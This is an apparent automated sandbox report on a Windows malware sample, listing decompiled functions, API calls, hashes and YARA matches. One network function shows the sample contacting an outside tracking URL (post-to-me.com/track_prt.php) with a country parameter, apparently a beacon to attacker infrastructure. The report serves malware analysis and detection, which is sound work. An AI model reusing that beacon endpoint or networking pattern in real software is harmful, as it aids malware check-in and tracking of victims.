String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 61cfcb8a269d5cf9be908b7264bd024e1ef9575c5d928871ac7cba30587f69f1
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 9EF0F035A206586BCF15F7BB882096EFA6BDFC1B18B10416FD811A3350EF649E058ED2

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024AA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA0C4

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA0D6
_free.LIBCMT ref: 024AA0E8
_free.LIBCMT ref: 024AA0FA
_free.LIBCMT ref: 024AA10C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 9bdfb0a4629b27b43b71d5c52d9e02c352ffd42c6b8cc2325cd89e18435b3b67
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: EAF06232509620AB8670EF59E8D6C0777EAAA14790764095BF008D7B11CB75F890CE59

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 024A1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A19AF

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A19C1
_free.LIBCMT ref: 024A19D4
_free.LIBCMT ref: 024A19E5
_free.LIBCMT ref: 024A19F6

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: eab23c0ae3902ff33b016c09165dc377b5b01624257cc4ec4544991858f8d174
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: FEF03070D047109F9F716F19AD904053F65AF29B62B0002ABF406977B2D774E862DF8E

Function 0248CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0248CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0248CF67
GetCurrentThread.KERNEL32 ref: 0248CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0248CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0248CF8C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: e6a92c96a1e9fdf56f5bc352c87485f8e7f320f972e9c2675893e6a14a246b5b
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 57F03736211500DBC629FF62E6909BFB7B6AFC4610310455FE68747590CF21A947DB71

Function 02472E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472E8E

Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471328
Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024730A1

Strings

&cc=DE, xrefs: 0247301B, 02473021, 0247307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02472EBE, 02472FEA, 02473059

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: d5ccd31b2cbb2af03a9fe18a5c51409eb2b1ea8232e5f65add460cab39c645ed
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: CA5153A5E55344A8E320EFB0BC45B723378FF58712F10543BD528CB2B2E7A19944871E

Function 02498937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0249896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02498A23

Strings

fB, xrefs: 02498A15, 02498A1E, 02498A2F
csm, xrefs: 02498A0D

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 5ca6f334394dd3f6877c4931c8ecc33140facd94952ab1d27af6a3bf6aac2051
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8741D434A002489FCF10DF2DC884AAEBFA5AF46328F14816BE9159B391D7329A01CF91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\7gxaFDUSOD.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\7gxaFDUSOD.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\7gxaFDUSOD.exe
API String ID: 2506810119-1852767174
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0249F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\7gxaFDUSOD.exe,00000104), ref: 0249F9BA
_free.LIBCMT ref: 0249FA85
_free.LIBCMT ref: 0249FA8F

Strings

C:\Users\user\Desktop\7gxaFDUSOD.exe, xrefs: 0249F9B1, 0249F9B8, 0249F9E7, 0249FA1F

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\7gxaFDUSOD.exe
API String ID: 2506810119-1852767174
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: d499d96f1402e211989b74375e3031a87a9e10ca23de15f59ada815345c43f70
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 7D317C71A00258EFDF21DF9A9C8099EBFFCEF99710B1140ABE804D7621D6709A44CB90

Function 0247C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0247C8DE

Strings

ios_base::badbit set, xrefs: 0247C8A1, 0247C8C1
ios_base::failbit set, xrefs: 0247C8AB
ios_base::eofbit set, xrefs: 0247C8B0

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: 049c6727811fb1aa356781be3b944feec525705c1a35b402c3ec987ade1b52c4
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 68F050B3C406086BCB04EA54CDC1BEF33989B06316F04806FDD62AB182EB789945CFA4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024A5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024A5B8A
__alldvrm.LIBCMT ref: 024A5D8B
__alldvrm.LIBCMT ref: 024A5DAD

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: df72fd2d1c62846be8c75fdec26bbffb4d4cd5b66c90d805d6ba129b5335aa4c
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 78A15972D013869FEB26CF28C9A57AEBBE1EF65314F58816FD5859B381C3348941CB50

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024AFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AFD9E

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: ed7d319149688fe1d7b3a0bbed2b2bc2aa4460cb3770df107cb724985efca93d
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 3D41AF31A00600ABDB226FBE8C60BAF3B66EF31730F11061FF42AD66D0D77644458BA1

Function 024A6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024A047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024A6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024A6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024A6BEC
__freea.LIBCMT ref: 024A6BF5

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 93e2e34bc3baba9a00dc80a189d8fe73fa1c5d60f0dd9a58292053eb7113b7da
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: FA31D072A0121AABDF24CF65CC50DEF7BA9EF50714B0A426EEC14D7290EB35D951CB90

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 0247D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0247D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0247D6C4
_xtime_get.LIBCPMT ref: 0247D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0247D6F3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: afd418d2fcfd3a3a3df5626c818358664d3d7937a497cd5ad49adec3010e51d2
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 17214C75E10209EFDF00EFA5CC819FEBBB9EF09714F1000AAE611A7290D770AD018BA0
